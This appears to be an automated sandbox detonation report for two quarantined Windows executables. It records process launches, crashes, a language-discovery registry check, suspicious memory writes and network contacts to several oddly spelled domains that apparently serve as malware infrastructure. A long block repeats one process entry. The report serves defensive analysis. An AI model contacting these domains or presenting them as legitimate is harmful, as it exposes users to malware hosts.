C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4500 -ip 4500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 776
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 104.21.112.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 172.67.164.79:443 | tracnquilforest.life | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | presentymusse.world | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | boltetuurked.digital | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/4500-0-0x0000000074D7E000-0x0000000074D7F000-memory.dmp
memory/4500-1-0x0000000000DE0000-0x0000000000E48000-memory.dmp
memory/4500-2-0x0000000005CC0000-0x0000000006264000-memory.dmp
memory/4876-4-0x0000000000400000-0x000000000045E000-memory.dmp
memory/4876-6-0x0000000000400000-0x000000000045E000-memory.dmp
memory/4500-7-0x0000000074D70000-0x0000000075520000-memory.dmp
memory/4876-8-0x0000000000400000-0x000000000045E000-memory.dmp
memory/4876-9-0x0000000000400000-0x000000000045E000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
100s
Max time network
149s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
